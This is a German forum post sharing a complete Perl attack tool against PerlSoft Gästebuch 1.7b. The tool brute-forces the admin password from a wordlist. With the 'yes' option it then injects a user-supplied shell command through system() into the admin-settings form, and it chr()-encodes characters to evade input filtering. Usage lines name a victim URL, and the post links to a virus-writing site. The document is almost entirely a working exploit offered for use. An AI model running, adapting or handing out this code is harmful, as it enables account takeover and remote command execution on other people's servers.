[+]Topic: Code [+]Von: Perforin [+]Return: Code
Mein PerlSoft Gästebuch Bruter mit eingebauten RCE Exploit. RCE Exploit kann erst ausgeführt werden wenn man den Login gebrutet hat. RCE ist möglich durch eine schlechte Überprüfung der Login Daten, sowie die Einbindung der Datei mit den Login Daten ins Admincenter.
#!/usr/bin/perl =pod Typ: Bruter & RCE Software: PerlSoft Gästebuch Version: 1.7b Coder/Bugfounder: Perforin Visit: DarK-CodeZ.org Note: RCE ist only 1 time possible, do not waste your command! Greetings: Sph1nX,Neo2k8,fraggle,SkyOut,the-janky,double_check,ringwrath-4,JackT =cut use strict; use warnings; use diagnostics; use LWP::Simple; use LWP::Simple::Post qw(post post_xml); my ($url,$user,$wordlist,$error_counter,$word,$anfrage); my ($falsch,$richtig,$entry,$rce,$send,$crypted); my (@response,@rcesend,@array); if (@ARGV < 4) { &fail; } ($url,$user,$wordlist) = (@ARGV); $falsch = '<tr><td align=center><Font color="000000" FACE="Arial">Nur Administratoren mit gültigen Benutzerdaten haben Zugang in das Admin-Center!</font></td></tr>'; $richtig ='<tr><td bgcolor=#E0E0E0 align=center><B><Font color="000000" FACE="Arial">Gästebuch Vorlage - Einstellen</font></B></td></tr>'; if ($url !~ m/^http:\/\//) { &fail; } if ($wordlist !~ m/\.(txt|list|dat)$/) { &fail; } print <<"show"; --==[Perforins PerlSoft GB Pwner]==-- [+] Attack: $url [+] User: $user [+] Wordlist: $wordlist show open(WordList,"<","$wordlist") || die "No wordlist found!"; foreach $word (<WordList>) { chomp($word); $crypted = crypt($word,"codec"); $anfrage = $url.'?sub=vorlage&id='.$user.'&pw='.$crypted; @array = get($anfrage) || (print "[-] Cannot connect!\n") && exit; foreach $entry (@array) { if ($entry =~ m/$richtig/i) { print "\n[+] Password cracked: "."$crypted:$word"." !\n\n"; if ($ARGV[3] =~ m/yes/i ) { print <<"RCE"; [+] Remote Command Execution possible! [~] Note: Only _1_ time exploitable, do not waste it! [+] Please enter your Command! RCE chomp($rce = <STDIN>); $rce =~ s/>/\"\.chr(62)\.\"/ig; $rce =~ s/</\"\.chr(60)\.\"/ig; $rce =~ s/\|/\"\.chr(124)\.\"/ig; $rce =~ s/&/\"\.chr(38)\.\"/ig; $rce =~ s/\//\"\.chr(47)\.\"/ig; $rce =~ s/-/\"\.chr(45)\.\"/ig; $send = 'loginname='.$user.'&loginpw='.$word.'&loginname1='.$user.'";system("'.$rce.'");print "h4x&loginpw1='.$word.'&loginpw2='.$word.'&id='.$user.'&pw='.$crypted.'&sub=saveadmindaten'; @response = post($url, $send); @rcesend = get($url) || (print "[-] Cannot connect!\n") && exit; print <<"END"; [+] Command executed! ---====[www.vx.perforin.de.vu]====--- END exit; } else { (print "---====[www.vx.perforin.de.vu]====---\n") and exit; } } elsif ($entry =~ m/$falsch/i) { $error_counter++; print "[!] Tested ".$error_counter.": "."$crypted:$word"."\n"; } } } close(WordList); print "[-] Could not be cracked!\n---====[www.vx.perforin.de.vu]====---\n"; exit; sub fail { print <<"CONFIG"; +-------------------+ | | | PerlSoft GB Pwner | | v0.1 | | | +-------------------+-----[Coded by Perforin]-----------------------------+ | | | pwner.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt yes | | pwner.pl http://opfer.lu/cgi-bin/admincenter.cgi admin wordlist.txt no | | | | yes = Remote Command Execution | | no = No Remote Command Execution | | | +-------------------------[vx.perforin.de.vu]-----------------------------+ CONFIG exit; }